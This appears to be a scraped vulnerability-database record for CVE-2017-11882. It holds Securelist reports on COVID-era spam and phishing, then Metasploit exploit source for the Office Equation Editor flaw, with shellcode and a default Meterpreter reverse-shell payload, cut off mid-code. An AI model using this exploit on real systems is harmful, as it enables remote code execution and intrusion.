With its pandemic and mass transition to remote work and online communication, last year was an unusual one, which was reflected in spam statistics.
Attackers exploited the COVID-19 theme, invited victims to non-existent video conferences and insisted that their targets register with "new corporate services". Given that the fight against the pandemic is not over yet, we can assume that the main trends of 2020 will stay relevant into the near future.

The general growing trend of targeted attacks on the corporate sector will continue into next year, all the more so because the increasingly popular remote work mode makes employees more vulnerable. Users of instant messaging networks should raise their guard, as the amount of spam and phishing messages received by their mobile devices is likely to grow as well. Besides, the number of email messages and schemes exploiting the COVID-19 theme one way or another has a high likelihood of rising.

", "cvss3": {}, "published": "2021-02-15T10:00:38", "type": "securelist", "title": "Spam and phishing in 2020", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2021-02-15T10:00:38", "id": "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "href": "https://securelist.com/spam-and-phishing-in-2020/100512/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-26T11:50:09", "description": "

## Quarterly highlights

### Don't get burned

Burning Man is one of the most eagerly awaited events among fans of spectacular performance and installation art. The main obstacle to attending is the price of admission: a standard ticket will set you back $475, their number is limited, and the buying process is a challenge all by itself (there are several stages, registration data must be entered at a specific time, and if something goes wrong you might not get a second chance).
Therefore, half-price fake tickets make for excellent bait.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202244/sl_spam_report_11.png>)

Scammers tried to make their website as close as possible to the original — even the page with the ticket description looked genuine.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202316/sl_spam_report_12.png>)

There were just three major differences from the original: only the main page and the ticket purchase section were actually operational, tickets were "sold" without prior registration, and the price was a steal ($225 versus $475).

### Oscar-winning scammers

February 2020 saw the 92nd Academy Awards ceremony. Even before the big night, websites were popping up offering free viewings of all the nominated films. Fraudsters targeted users eager to see the short-listed movies before the presentation of the awards.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202400/sl_spam_report_13.png>)

To promote these sites, Twitter accounts were created — one for each nominated film.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202431/sl_spam_report_14.png>)

Curious users were invited to visit the site, where they were shown the first few minutes before being asked to register to continue watching.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202503/sl_spam_report_15.png>)

During registration, the victim was prompted to enter their bank card details, allegedly to confirm their region of residence. Unsurprisingly, a short while later a certain amount of money disappeared from their account, and the movie did not resume.

![Screenshot](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202534/sl_spam_report_16.png>)

Users should be alert to the use of short links in posts on social networks.
Scammers often use them because it's impossible to see where a shortened URL points without actually following it.\n\nThere are special services that let you check what lies behind such links, often with an additional bonus in the form of a verdict on the safety of the website content. It is important to do a proper check on links from untrusted sources.\n\n### ID for hire\n\nUS companies that leak customer data can be heavily fined by the Federal Trade Commission (FTC). For example, in 2019 Facebook was slapped with a $5 billion penalty; however, users whose data got stolen do not receive any compensation. This is what scammers decided to exploit by sending a fake e-mail offering compensation from the non-existent Personal Data Protection Fund, created by the equally fictitious US Trading Commission.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22202917/sl_spam_report_40.png.jpg>)\n\nInspired by the idea of services for checking accounts for leaks, the cybercriminals decided to create their own. Visitors were invited to check whether their account details had been stolen, and if so (the answer was \"yes\" even if the input was gibberish), they were promised compensation \"for the leakage of personal data.\"\n\nTo receive \"compensation,\" the victim's citizenship was of no consequence \u2014 what mattered was their first name, last name, phone number, and social network accounts. For extra authenticity, a warning message about the serious consequences of using other people's data to claim compensation popped up obsessively on the page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203248/sl_spam_report_41.jpg>)\n\nTo receive the payment, US citizens were asked to enter their Social Security Number (SSN). Everyone else had to check the box next to the words \"I'am don't have SSN\" (the mistakes are a good indicator of a fake), whereupon they were invited to \"rent\" an SSN for $9. 
Interestingly, even if the user already had an SSN, they were still pestered to get another one.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203357/sl_spam_report_42.jpg>)\n\nAfter that, the potential victim was redirected to a payment page with the amount and currency based on the user's location. For instance, users in Russia were asked to pay in rubles.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203504/sl_spam_report_43.jpg>)\n\nThe scam deployed the conventional scheme (especially common in the Runet) of asking the victim to pay a small commission or down payment for the promise of something much bigger. In Q1, 14,725,643 attempts to redirect users to such websites were blocked.\n\n## Disaster and pandemic\n\n### Fires in Australia\n\nThe natural disaster that hit the Australian continent was another get-rich opportunity for scammers. For example, one \"Nigerian prince\"-style e-mail scam reported that a millionaire dying of cancer was ready to donate her money to save the Australian forests. The victim was asked to help withdraw the funds from the dying woman's account by paying a fee or making a small contribution to pay for the services of a lawyer, for which they would be rewarded handsomely at a later date.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203546/sl_spam_report_21.png>)\n\nBesides the fictional millionaire, other \"nature lovers\" were keen to help out \u2014 their e-mails were more concise, but the scheme was essentially the same.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203616/sl_spam_report_22.png>)\n\n### COVID-19\n\n#### \"Nigerian prince\" scheme\n\nCOVID-19 was (and continues to be) a boon to scammers: non-existent philanthropists and dying millionaires are popping up everywhere offering rewards for help to withdraw funds supposedly for humanitarian purposes. 
Some recipients were even invited to help finance the production of a miracle vaccine, or take part in a charity lottery, the proceeds of which, it was said, would be distributed to poor people affected by the pandemic.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203723/sl_spam_report_23.png>)\n\n#### Bitcoin for coronavirus\n\nHaving introduced themselves as members of a healthcare organization, the scammers appealed to the victim to transfer a certain sum to the Bitcoin wallet specified in the message. The donation would allegedly go toward fighting the coronavirus outbreak and developing a vaccine, as well as helping victims of the pandemic.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203816/sl_spam_report_24.png>)\n\nIn one e-mail, the attackers played on people's fear of contracting COVID-19: the message was from an unnamed \"neighbor\" claiming to be dying from the virus and threatening to infect the recipient unless the latter paid a ransom (which, it was said, would help provide a comfortable old age for the ransomer's parents).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203854/sl_spam_report_25.png>)\n\n#### Dangerous advice from the WHO\n\nOne fraudulent mailing disguised as a WHO newsletter offered tips about staying safe from COVID-19.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22203939/sl_spam_report_26.png>)\n\nTo get the information, the recipient had to click a link pointing to a fake WHO website. The design was so close to the original that only the URL gave away the scam. The cybercriminals were after login credentials for accounts on the official WHO site. 
Whereas in the first mailings only a username and password were asked for, in later ones a phone number was also requested.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204032/sl_spam_report_27.png>)\n\nIn addition, we detected several e-mails supposedly from the WHO containing documents with malware. The recipient was asked to open the attachment (in DOC or PDF format), which allegedly offered coronavirus prevention advice. For example, this message contained [Backdoor.Win32.Androm.tvmf](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.Androm/>):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204128/sl_spam_report_28.png>)\n\nThere were other, less elaborate mailings with harmful attachments, including ones containing Trojan-Spy.Win32.Noon.gen:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204203/sl_spam_report_29.png>)\n\n#### Corporate segment\n\nThe coronavirus topic was also exploited in attacks on the corporate sector. For example, COVID-19 was cited in fraudulent e-mails as a reason for delayed shipments or the need to reorder. The authors marked the e-mails as urgent and demanded that recipients check the attached files immediately.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204258/sl_spam_report_30.png>)\n\nAnother mailing prompted recipients to check whether their company was in a list of firms whose activities were suspended due to the pandemic, after which it asked for a form to be filled out; otherwise, the company could be shut down. Both the list of companies and the form were allegedly in the archives attached to the message. 
In fact, the attachments contained [Trojan-PSW.MSIL.Agensla.a](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204343/sl_spam_report_31.png>)\n\nWe also registered a phishing attack on corporate users. On a fake page, visitors were invited to monitor the coronavirus situation across the world using a special resource, for which the username and password of the victim's corporate mail account were required.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204434/sl_spam_report_32.png>)\n\n#### Government compensation\n\nThe introduction of measures to counter the pandemic put many people in a difficult financial situation. Forced downtime in many industries has had a negative impact on financial well-being. In this climate, websites offering compensation from the government pose a particular danger.\n\nOne such popular scheme was [highlighted](<https://twitter.com/assolini/status/1242054069193183235>) by a colleague of ours from Brazil. WhatsApp messages about financial or food assistance were sent that appeared to come from a supermarket, bank, or government department. To receive the aid, the victim had to fill out the attached form and share the message with a certain number of contacts. 
After the form was filled out, the data was sent to the cybercriminals, while the victim got redirected to a page with advertising, a phishing site, a site offering a paid SMS subscription, or similar.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204543/sl_spam_report_34.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204614/sl_spam_report_35.png>)\n\nGiven that the number of fake sites offering government handouts seems likely only to increase, we urge caution when it comes to promises of compensation or material assistance.\n\n#### Anti-coronavirus protection with home delivery\n\nDue to the pandemic, demand for antiseptics and antiviral agents has spiked. We registered a large number of mailings with offers to buy antibacterial masks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204656/sl_spam_report_36.png>)\n\nIn Latin America, WhatsApp mass messages were used to invite people to take part in a prize draw for hand sanitizer products from the brewing company Ambev. The company has indeed started making antiseptics and hand gel, but exclusively for public hospitals, so the giveaway was evidently the work of fraudsters.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204722/sl_spam_report_37.png>)\n\nThe number of fake sites offering folk remedies for the treatment of coronavirus, drugs to strengthen the immune system, and non-contact thermometers and test kits has also risen sharply. Most of the products on offer have no kind of certification whatsoever.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204747/sl_spam_report_38.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22204823/sl_spam_report_39.png>)\n\nOn average, the daily share of e-mails mentioning COVID-19 in Q1 amounted to around 6% of all junk traffic. 
More than 50% of coronavirus-related spam was in the English language. We anticipate that the number of phishing sites and pandemic-related scams will only increase, and that cybercriminals will use new attack schemes and strategies.\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22212717/sl_spam_report_01-en-dolya-spama-v-mirovom-pochtovom-trafike-q4-2019-q1-2020-g.png>)_\n\nIn Q1 2020, the largest share of spam was recorded in January (55.76%). The average percentage of spam in global mail traffic was 54.61%, down 1.58 p.p. against the previous reporting period.\n\n_Proportion of spam in Runet mail traffic, Q4 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22212802/sl_spam_report_02-en-dolya-spama-v-pochtovom-trafike-runeta-q4-2019-q1-2020-g.png>)_\n\nIn Q1, the share of spam in Runet traffic (the Russian segment of the Internet) likewise peaked in January (52.08%). At the same time, the average indicator, as in Q4 2019, remained slightly lower than the global average (by 3.20 p.p.).\n\n### Sources of spam by country\n\n_Sources of spam by country, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22212844/sl_spam_report_03-en-strany-istochniki-spama-v-mire-pervyj-kvartal-2020-g.png>)_\n\nIn Q1 2020, Russia led the TOP 5 countries by amount of outgoing spam. It accounted for 20.74% of all junk traffic. In second place came the US (9.64%), followed by Germany (9.41%) just 0.23 p.p. behind. 
Fourth place went to France (6.29%) and fifth to China (5.22%), which is usually a TOP 3 spam source.\n\nBrazil (3.56%) and the Netherlands (3.38%) took sixth and seventh positions, respectively, followed by Vietnam (2.55%), with Spain (2.34%) and Poland (2.21%) close on its heels in ninth and tenth.\n\n### Spam e-mail size\n\n_Spam e-mail size, Q4 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22212928/sl_spam_report_04-en-razmery-spamovyh-pisem-vtoroj-i-tretij-kvartaly-2019-g.png>)_\n\nCompared to Q4 2019, the share of very small e-mails (up to 2 KB) in Q1 2020 fell by more than 6 p.p. and amounted to 59.90%. The proportion of e-mails sized 5-10 KB grew slightly (by 0.72 p.p.) against the previous quarter to 5.56%.\n\nMeanwhile, the share of 10-20 KB e-mails climbed by 3.32 p.p. to 6.36%. The number of large e-mails (100\u2013200 KB) also posted growth (+2.70 p.p.). Their share in Q1 2020 was 4.50%.\n\n### Malicious attachments in e-mail\n\n_Number of Mail Anti-Virus triggerings, Q4 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213009/sl_spam_report_05-en-kolichestvo-srabatyvanij-pochtovogo-antivirusa-q4-2019-q1-2020-g.png>)_\n\nIn Q1 2020, our security solutions detected a total of 49,562,670 malicious e-mail attachments, which is almost identical to the figure for the last reporting period (there were just 314,862 more malicious attachments detected in Q4 2019).\n\n_TOP 10 malicious attachments in mail traffic, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213057/sl_spam_report_06-en-top-10-vredonosnyh-vlozhenij-v-pochtovom-trafike-pervyj-kvartal-2020-g.png>)_\n\nIn Q1, first place in terms of prevalence in mail traffic went to Trojan.Win32.Agentb.gen (12.35%), followed by Exploit.MSOffice.CVE-2017-11882.gen (7.94%) in second and Worm.Win32.WBVB.vam (4.19%) in third.\n\n_TOP 10 
malicious families in mail traffic, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213137/sl_spam_report_07-en-top-10-vredonosnyh-semejstv-v-pochtovom-trafike-pervyj-kvartal-2020.png>)_\n\nAs regards malware families, the most widespread this quarter was [Trojan.Win32.Agentb](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Agentb/>) (12.51%), with [Exploit.MSOffice.CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (7.98%), whose members exploit a vulnerability in Microsoft Equation Editor, in second place and [Worm.Win32.WBVB](<https://threats.kaspersky.com/en/threat/Worm.Win32.WBVB/>) (4.65%) in third.\n\n### Countries targeted by malicious mailshots\n\n_Distribution of Mail Anti-Virus triggerings by country, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213218/sl_spam_report_08-en-raspredelenie-srabatyvanij-pochtovogo-antivirusa-po-stranam-pervyj-kvartal-2020-g.png>)_\n\nFirst place by number of Mail Anti-Virus triggerings in Q1 2020 was claimed by Spain. This country accounted for 9.66% of all users of Kaspersky security solutions who encountered e-mail malware worldwide. Second place went to Germany (8.53%), and Russia (6.26%) took bronze.\n\n## Statistics: phishing\n\nIn Q1 2020, the Anti-Phishing system prevented **119,115,577** attempts to redirect users to scam websites. 
The percentage of unique attacked users was 8.80% of the total number of users of Kaspersky products in the world.\n\n### Attack geography\n\nThe country with the largest proportion of users attacked by phishers, not for the first time, was Venezuela (20.53%).\n\n_Geography of phishing attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213300/sl_spam_report_09-en-geografiya-fishingovyh-atak-pervyj-kvartal-2020-goda.png>)_\n\nIn second place, by a margin of 5.58 p.p., was Brazil (14.95%), another country that is no stranger to the TOP 3. Next came Australia (13.71%), trailing by just 1.24 p.p.\n\n**Country** | **%*** \n---|--- \nVenezuela | 20.53% \nBrazil | 14.95% \nAustralia | 13.71% \nPortugal | 12.98% \nAlgeria | 12.12% \nFrance | 11.71% \nHonduras | 11.62% \nGreece | 11.58% \nMyanmar | 11.54% \nTunisia | 11.53% \n \n_* Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky users in the country_\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky products' Anti-Phishing component. This component detects pages with phishing content that the user gets redirected to. It does not matter whether the redirect is the result of clicking a link in a phishing e-mail or in a message on a social network, or the result of malicious program activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThe largest share of phishing attacks in Q1 2020 fell to the Online Stores category (18.12%). 
Second place went to Global Internet Portals (16.44%), while Social Networks (13.07%) came in third.\n\n_Distribution of organizations affected by phishing attacks by category, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213351/sl_spam_report_10-en-raspredelenie-organizacij-chi-polzovateli-byli-atakovany-fisherami-po-kategoriyam-pervyj-kvartal-2020-g.png>)_\n\nAs for the Banks category, a TOP 3 veteran, this time it placed fourth with 10.95%.\n\n## Conclusion\n\nGlancing at the results of Q1 2020, we anticipate that the COVID-19 topic will continue to be actively used by cybercriminals for the foreseeable future. To attract potential victims, the pandemic will be mentioned even on \"standard\" fake pages and in spam mailings.\n\nThe topic is also used extensively in fraudulent schemes offering compensation and material assistance.\n\nIt is highly likely that this type of fraud will become more frequent.\n\nThe average share of spam in global mail traffic (54.61%) this quarter decreased by 1.58 p.p. against the previous reporting period, while the number of attempted redirects totaled nearly 120 million.\n\nTop of this quarter's list of spam-source countries is Russia, with a share of 20.74%. 
Our security solutions blocked 49,562,670 malicious mail attachments, while the most common mail-based malware family, with a 12.35% share of mail traffic, was Trojan.Win32.Agentb.gen.", "cvss3": {}, "published": "2020-05-26T10:00:50", "type": "securelist", "title": "Spam and phishing in Q1 2020", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-05-26T10:00:50", "id": "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "href": "https://securelist.com/spam-and-phishing-in-q1-2020/97091/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-09T21:28:48", "description": "This Metasploit module exploits a flaw in how the Equation Editor handles OLE objects in memory to execute arbitrary code using RTF files without interaction.", "cvss3": {}, "published": "2017-12-06T00:00:00", "type": "zdt", "title": "Microsoft Office Equation Editor Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-12-06T00:00:00", "id": "1337DAY-ID-29119", "href": "https://0day.today/exploit/description/29119", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FILEFORMAT\r\n\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft Office CVE-2017-11882',\r\n 'Description' => %q{\r\n Module exploits a flaw in how the Equation Editor that\r\n allows an attacker to execute arbitrary code in RTF files without\r\n interaction. 
The vulnerability is caused by the Equation Editor,\r\n to which fails to properly handle OLE objects in memory.\r\n },\r\n 'Author' => ['mumbai', 'embedi'],\r\n 'License' => MSF_LICENSE,\r\n 'DisclosureDate' => 'Nov 15 2017',\r\n 'References' => [\r\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\r\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Targets' => [\r\n ['Microsoft Office', {} ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Payload' => {\r\n 'DisableNops' => true\r\n },\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\r\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\r\n ])\r\n end\r\n\r\n def retrieve_header(filename)\r\n if (not datastore['FOLDER_PATH'].nil?)\r\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\r\n else\r\n path = nil\r\n end\r\n if (not path.nil?)\r\n if ::File.file?(path)\r\n File.open(path, 'rb') do |fd|\r\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\r\n header = header.to_s # otherwise I get nil class...\r\n print_status(\"Injecting #{path}...\")\r\n return header\r\n end\r\n else\r\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\r\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\r\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\r\n end\r\n else\r\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\r\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\r\n header << 
'\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\r\n end\r\n return header\r\n end\r\n\r\n\r\n\r\n def generate_rtf\r\n header = retrieve_header(datastore['FILENAME'])\r\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\r\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\r\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\r\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\r\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\r\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\r\n object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\r\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\r\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\r\n\r\n\r\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\r\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\r\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\r\n shellcode << \"\\x9e\" # 6: 9e sahf\r\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\r\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\r\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\r\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\r\n shellcode << \"\\\\\" # 12: 5c pop esp\r\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\r\n shellcode << \"\\xee\" # 15: ee out dx,al\r\n shellcode << \"[\" # 16: 5b pop ebx\r\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\r\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\r\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\r\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\r\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\r\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\r\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\r\n shellcode << 
\"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\r\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\r\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\r\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\r\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\r\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\r\n shellcode << \"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\r\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\r\n shellcode << \"\\x53\" # 3e: 53 push ebx\r\n shellcode << \"\\x51\" # 3f: 51 push ecx\r\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\r\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\r\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\r\n shellcode << \"\\x53\" # 49: 53 push ebx\r\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\r\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\r\n shellcode << \"\\x90\" # 50: 90 nop\r\n shellcode << \"\\x90\" # 50: 90 nop\r\n\r\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\r\n footer << '00000000000000000000000000000000000000000000000000000'\r\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\r\n footer << '0000C5000000000000000000000000000000000000000000000000'\r\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\r\n footer << '000000000000000000000000000000000000000000000000000000'\r\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\r\n footer << 
'000000000000000000000000000000000000000000000000000000'\r\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\r\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '00000000000000001050000050000000D0000004D45544146494C'\r\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\r\n footer << '500000002001C0000000000050000000902000000000500000002'\r\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\r\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\r\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\r\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\r\n footer << 